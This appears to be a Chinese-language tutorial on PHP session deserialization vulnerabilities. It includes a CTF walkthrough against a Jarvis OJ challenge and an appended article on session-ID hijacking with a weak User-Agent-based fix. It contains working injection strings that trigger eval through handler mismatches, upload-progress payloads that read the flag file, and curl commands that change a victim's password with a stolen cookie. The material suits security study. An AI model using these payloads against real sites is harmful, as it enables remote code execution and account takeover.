PHP session反序列化漏洞
PHP session反序列化漏洞,就是当【序列化存储Session数据】与【反序列化读取Session数据】的方式不同导致session反序列化漏洞的产生
什么是session
官方Session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置信息。主要有以下特点:
- session保存的位置是在服务器端
- session通常是要配合cookie使用
因为HTTP的无状态性,服务端产生了session来标识当前的用户状态
本质上,session就是一种可以维持服务器端的数据存储技术。即**session技术就是一种基于后端有别于数据库的临时存储数据的技术**
PHP session工作流程
- 以PHP为例,理解session的原理
- PHP脚本使用 session_start()时开启session会话,会自动检测PHPSESSID
如果Cookie中存在,获取PHPSESSID
如果Cookie中不存在,创建一个PHPSESSID,并通过响应头以Cookie形式保存到浏览器
初始化超全局变量$_SESSION为一个空数组
PHP通过PHPSESSID去指定位置(PHPSESSID文件存储位置)匹配对应的文件
- 存在该文件:读取文件内容(通过反序列化方式),将数据存储到$_SESSION中
- 不存在该文件: session_start()创建一个PHPSESSID命名文件
程序执行结束,将$_SESSION中保存的所有数据序列化存储到PHPSESSID对应的文件中
具体原理图:
php.ini session配置
php.ini里面有较重要的session配置项
session.save_path=”/tmp” –设置session文件的存储位置
session.save_handler=files –设定用户自定义存储函数,如果想使用PHP内置session存储机制之外的可以使用这个函数
session.auto_start= 0 –指定会话模块是否在请求开始时启动一个会话,默认值为 0,不启动
session.serialize_handler= php –定义用来序列化/反序列化的处理器名字,默认使用php
session.upload_progress.enabled= On –启用上传进度跟踪,并填充$ _SESSION变量,默认启用
session.upload_progress.cleanup= oN –读取所有POST数据(即完成上传)后立即清理进度信息,默认启用。
PHP session序列化机制
根据php.ini中的配置项,我们研究将$_SESSION中保存的所有数据序列化存储到PHPSESSID对应的文件中,使用的三种不同的处理格式,即session.serialize_handler定义的三种引擎:
处理器 | 对应的存储格式 |
---|---|
php | 键名 + 竖线 + 经过 serialize() 函数反序列处理的值 |
php_binary | 键名的长度对应的 ASCII 字符 + 键名 + 经过 serialize() 函数反序列处理的值 |
php_serialize (php>=5.5.4) | 经过 serialize() 函数反序列处理的数组 |
php处理器
首先来看看默认session.serialize_handler = php时候的序列化结果,代码如下
<?php//ini_set(‘session.serialize_handler’,’php’);session_start();$_SESSION[‘name’] = $_GET[‘name’];echo $_SESSION[‘name’];?>
为了方便查看,将session存储目录设置为session.save_path = “/www/php_session” ,PHPSESSID文件如下
1、文件名
文件名为sess_mpnnbont606f50eb178na451od,其中mpnnbont606f50eb178na451od就是后续请求头中Cookie携带的PHPSESSID的值 (如上图浏览器中已存储)
2、文件内容
php处理器存储格式
键名 | 竖线 | 经过 serialize() 函数反序列处理的值 |
---|---|---|
$_SESSION[‘name’]的键名:name | | | s:6:“harden”; |
php_binary处理器
使用php_binary处理器,即session.serialize_handler = php_binary
<?phpini_set(‘session.serialize_handler’,’php_binary’);session_start();# 为了方便ACSII显示,将键名设置为36个字符长度$_SESSION[‘namenamenamenamenamenamenamenamename’] = $_GET[‘name’];echo $_SESSION[‘namenamenamenamenamenamenamenamename’];?>
由于三种方式PHPSESSID文件名都是一样的,这里只需要查看文件内容
键名的长度对应的 ASCII 字符 | 键名 | 经过 serialize() 函数反序列处理的值. |
---|---|---|
$ | namenamenamenamenamenamenamenamename | s:6:“harden”; |
php_serialize 处理器
使用php_binary处理器,即session.serialize_handler = php_serialize
<?phpini_set(‘session.serialize_handler’,’php_serialize’);session_start();$_SESSION[‘name’] = $_GET[‘name’];echo $_SESSION[‘name’];?>
文件内容即经过 serialize() 函数反序列处理的数组,a:1:{s:4:”name”;s:6:”harden”;}
session的反序列化漏洞利用
session的反序列化漏洞,就是利用php处理器和php_serialize处理器的存储格式差异而产生,通过具体的代码我们来看下漏洞出现的原因
漏洞成因
首先创建session.php,使用php_serialize处理器来存储session数据
<?phpini_set(‘session.serialize_handler’,’php_serialize’);session_start();$_SESSION[‘session’] = $_GET[‘session’];echo $_SESSION[‘session’];?>
test.php,使用默认php处理器来存储session数据
<?phpsession_start();class f4ke{
public $name;
function __wakeup(){
echo “Who are you?”;
}
function __destruct(){
eval($this->name);
}}$str = new f4ke();?>
接着,我们构建URL进行访问session.php:
http://www.session-serialize.com/session.php?session=|O:4:”f4ke”:1:{s:4:”name”;s:10:”phpinfo();”;}
打开PHPSESSID文件可看到序列化存储的内容
a:1:{s:7:”session”;s:45:”|O:4:”f4ke”:1:{s:4:”name”;s:10:”phpinfo();”;}
漏洞分析:
在session.php程序执行,我们将|O:4:”f4ke”:1:{s:4:”name”;s:10:”phpinfo();”;}通过php_serialize处理器序列化保存成PHPSESSID文件;
由于浏览器中保存的PHPSESSID文件名不变,当我们访问test.php,session_start();找到PHPSESSID文件并使用php处理器反序列化文件内容,识别格式即
键名 | 竖线 | 经过 serialize() 函数反序列处理的值 |
---|---|---|
a:1:{s:7:“session”;s:45:” | | | O:4:“f4ke”:1:{s:4:“name”;s:10:“phpinfo();”;} |
php处理器会以|作为分隔符,将O:4:”f4ke”:1:{s:4:”name”;s:10:”phpinfo();”;}反序列化,就会触发__wakeup()方法,最后对象销毁执行__destruct()方法中的eval()函数,相当于执行如下:
$_SESSION[‘session’] = new f4ke();$_SESSION[‘session’]->name = ‘phpinfo();’;
我们访问test.php,即可直接执行phpinfo()函数
CTF例题:PHPINFO
<?php//A webshell is wait for youini_set(‘session.serialize_handler’, ‘php’);session_start();class OowoO{
public $mdzz;
function __construct()
{
$this->mdzz = ‘phpinfo();’;
}
function __destruct()
{
eval($this->mdzz);
}}if(isset($_GET[‘phpinfo’])){
$m = new OowoO();}else{
highlight_string(file_get_contents(‘index.php’));}?>
我们可以看到ini_set(‘session.serialize_handler’, ‘php’),判断可能存在session反序列化漏洞,根据代码逻辑,访问URL加上phpinfo参数新建对象触发魔术方法执行phpinfo()函数,进一步查看session.serialize_handler配置
可见php.ini中session.serialize_handler = php_serialize,当前目录中被设置为session.serialize_handler = php,因此存在session反序列化利用的条件
补充知识
phpinfo文件中
local value(局部变量:作用于当前目录程序,会覆盖master value内容):php
master value(主变量:php.ini里面的内容):php_serialize
那么我们如何找到代码入口将利用代码写入到session文件?想要写入session文件就得想办法在$_SESSION变量中增加我们可控的输入点
补充知识
当检测Session 上传进度这一特性是开启状态,我们可以在客户端写一个文件上传的功能,文件上传的同时,POST一个与php.ini中设置的session.upload_progress.name同名变量PHP_SESSION_UPLOAD_PROGRESS,如下图,即可写入$_SESSION,进一步序列化写入session文件
下面是官方给出的一个文件上传时监测进度例子:
<form action=”upload.php” method=”POST” enctype=”multipart/form-data”>
<input type=”hidden” name=”<?php echo ini_get(“session.upload_progress.name”); ?>” value=”123″ /> <input type=”file” name=”file1″ />
<input type=”file” name=”file2″ />
<input type=”submit” /></form>
其中name=””也可以设置为name=”PHP_SESSION_UPLOAD_PROGRESS”
在session中存储的上传进度,如下所示:
<?php$_SESSION[“upload_progress_123”] = array(
“start_time” => 1234567890, // The request time 请求时间
“content_length” => 57343257, // POST content length 长度
“bytes_processed” => 453489, // Amount of bytes received and processed 已接收字节
“done” => false, // true when the POST handler has finished, successfully or not 是否上传完成
“files” => array(//上传的文件
0 => array(
“field_name” => “file1”, // Name of the <input/> field input中设定的变量名
// The following 3 elements equals those in $_FILES
“name” => “foo.avi”, //文件名
“tmp_name” => “/tmp/phpxxxxxx”,
“error” => 0,
“done” => true, // True when the POST handler has finished handling this file
“start_time” => 1234567890, // When this file has started to be processed
“bytes_processed” => 57343250, // Amount of bytes received and processed for this file
),
// An other file, not finished uploading, in the same request
1 => array(
“field_name” => “file2”,
“name” => “bar.avi”,
“tmp_name” => NULL,
“error” => 0,
“done” => false,
“start_time” => 1234567899,
“bytes_processed” => 54554,
),
));
其中,session中的field_name和name都是我们可控的输入点!
下面我们就开始解题拿到flag
首先,http://web.jarvisoj.com:32784/index.php?phpinfo查询设置
session.upload_progress.enabled = On –表明允许上传进度跟踪,并填充$ _SESSION变量
session.upload_progress.cleanup = Off –表明所有POST数据(即完成上传)后,不清理进度信息($ _SESSION变量)
即允许上传进度跟踪且结束后不清除数据,更有利使用session.upload_progress.name来将利用代码写入session文件
构造POST表单提交上传文件
<form action=”http://web.jarvisoj.com:32784/index.php” method=”POST” enctype=”multipart/form-data”>
<input type=”hidden” name=”PHP_SESSION_UPLOAD_PROGRESS” value=”123″ />
<input type=”file” name=”file” />
<input type=”submit” /></form>
构造序列化字符串作为payload(利用代码)
<?phpclass OowoO{
public $mdzz=’print_r(scandir(dirname(__FILE__)));’;}$obj = new OowoO();echo serialize($obj);?>//O:5:”OowoO”:1:{s:4:”mdzz”;s:36:”print_r(scandir(dirname(__FILE__)));”;}
为了防止”被转义,我们在payload中加入\
随意选择文件,点击表单提交,使用抓包工具burpsuite抓取请求包
并修改filename值为
|O:5:\”OowoO\”:1:{s:4:\”mdzz\”;s:36:\”print_r(scandir(dirname(__FILE__)));\”;}
发送请求包,代码执行过程分析:
因此直接执行print_r(scandir(dirname(__FILE__)));并返回
phpinfo查看当前目录,/opt/lampp/htdocs/
构造最终payload读取Here_1s_7he_fl4g_buT_You_Cannot_see.php文件内容,即flag
|O:5:\”OowoO\”:1:{s:4:\”mdzz\”;s:88:\”print_r(file_get_contents(\”/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\”));\”;}
php中的session安全
做PHP开发这么长时间,还真没有真正关注过安全的问题,每次都是以完成项目为主,最近在网上看到了一篇关于安全的文章,看完以后才注意到自己以前的项目都存在着很大的安全漏洞,于是挑了一个项目进行了测试,发现很容易就中招儿了。在这里我会分享自己写的一个测试的例子来说明PHP中的session是如何不安全的,以及在项目中如何加强其安全性。
对于session的原理机制,网上有很多好的文章来介绍,我们可以自行查阅。下面直接分享测试用的例子。
这个测试的例子主要就是一个登录页,登录成功以后可以修改密码,就这样一个简单的功能。
界面如下
首先是在项目入口的地方使用函数 session_start() 开启了session。这样当客户端发起请求的时候,会产生一个身份标识 也就是 SessionID。通过cookie的方式保存在客户端,客户端和服务端每次的通信都是靠这个SessionID来进行身份识别的。
登录成功以后,会将 用户id、用户名存入session中
1
$_SESSION[‘userid’] = 用户id
$_SESSION[‘uname’] = 用户名
以后所有的操作都是通过判断 $_SESSION[‘userid’]是否存在来检查用户是否登录。代码如下:
if(isset($_SESSION[‘userid’])) return true;
对于修改密码接口的调用是通过ajax post的方式将数据传输到服务端的。
$.post(“接口*******”,
{
oldpass:oldpass,
newpass:newpass,
userid:uid,
},
function(data){
data = eval(‘(‘ +data+ ‘)’);
$(‘.grant_info’).html(infos[data.info]).show();
}
);
注意,我这里将这段代码写在了html页面中,所以说如果看到了html代码,也就知道了接口地址了。
修改密码的接口是这样实现的,首先是判断用户是否登录,如果登录才会进行密码的修改操作。
测试例子的实现思路大概就是上面介绍的那样。
利用SessionID攻击
1. 首先是获取SessionID,当然攻击者获取此标识的方式有很多,由于我的水平有限,至于如何获取我在这里不做介绍。我们可以模拟一下,先正常访问此项目,然后通过浏览器查看SessionID,以此得到一个合法的用户标识。可以在请求头中看到此项ID
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: keep-alive
Cookie: Hm_lvt_bf1154ec41057869fceed66e9b3af5e7=1450428827,1450678226,1450851291,1450851486; PHPSESSID=2eiq9hcpu3ksri4r587ckt9jt7;
Host: ******
Referer: ******
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
得到sessionID以后,如果此用户登录成功,那么服务端的session里就有此用户的信息了。
2. 获取到SessionID以后,假如攻击者已经知道修改密码的接口,就可以直接修改此用户的密码了。如果攻击者还没有得到接口地址,可以通过查看页面代码找出接口地址。可以使用如下的命令
#curl –cookie “PHPSESSID=2eiq9hcpu3ksri4r587ckt9jt7″ 页面地址
上面我们说过,在此例子中ajax代码是写在html页面中的,所以在此页面可以查看到接口地址
部分html代码如下
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
……
var uid = $(“.userid”).val();
$.post(“/User/User/modifypass_do”,
{
oldpass:oldpass,
newpass:newpass,
userid:uid,
},
function(data){
data = eval(‘(‘ +data+ ‘)’);
$(‘.grant_info’).html(infos[data.info]).show();
}
);
……
<span><input type=”password” name=”oldpass” id=”textfield_o” placeholder=”原密码”></span>
<span><input type=”password” name=”newpass” id=”textfield_n” placeholder=”新密码”></span>
<span><input type=”password” name=”confirmpass” id=”textfield_c” placeholder=”确认密码”></span>
<input type=”button” class=”btn_ok” value=”确认修改” />
3. 得到接口以后可以通过curl 模拟post发送数据来修改密码
命令如下
# curl –cookie “PHPSESSID=2eiq9hcpu3ksri4r587ckt9jt7” -d oldpass=111111 -d newpass=000000 -d userid=用户id 接口地址
如果此用户已经登录,那么攻击者可以通过执行以上命令修改用户的密码。
解决方法
对于以上方式的攻击,我们可以通过使验证方式复杂化来加强其安全性。其中一种方式就是利用请求头中的User-Agent项来加强其安全性
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: keep-alive
Cookie: Hm_lvt_bf1154ec41057869fceed66e9b3af5e7=1450428827,1450678226,1450851291,1450851486; PHPSESSID=2eiq9hcpu3ksri4r587ckt9jt7;
Host: ******
Referer: ******
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
在项目开始的时候最初我们只是用了session_start()函数来开启session。现在我们可以在session_start() 下面 添加这段代码
$_SESSION[‘User_Agent’] = md5($_SERVER[‘HTTP_USER_AGENT’]);
然后在每次判断是否登录的时候,添加判断条件如下
If(isset($_SESSION[‘userid’]) && $_SESSION[‘User_Agent’] == md5($_SERVER[‘HTTP_USER_AGENT’])){
return true;
}
这样就可以避免上述简单的攻击。
总结:
当然,实际情况中的攻击远非这么简单,首先在获取SessionID这一步就比较困难,然后就是和服务端交互的代码尽量加密,可以避免上述的情况。在我们第二次修改代码以后,可以增加攻击的复杂程度,并不能杜绝攻击。攻击的方式多种多样,这里只是一种简单的方式,仅提供一种思路,但是原理是一样的,在实际情况中可以根据实际情况增强我们代码的安全程度。
本文来自投稿,不代表(钦钦技术栈)立场,如若转载,请注明出处:https://www.qin1qin.com/catagory/516/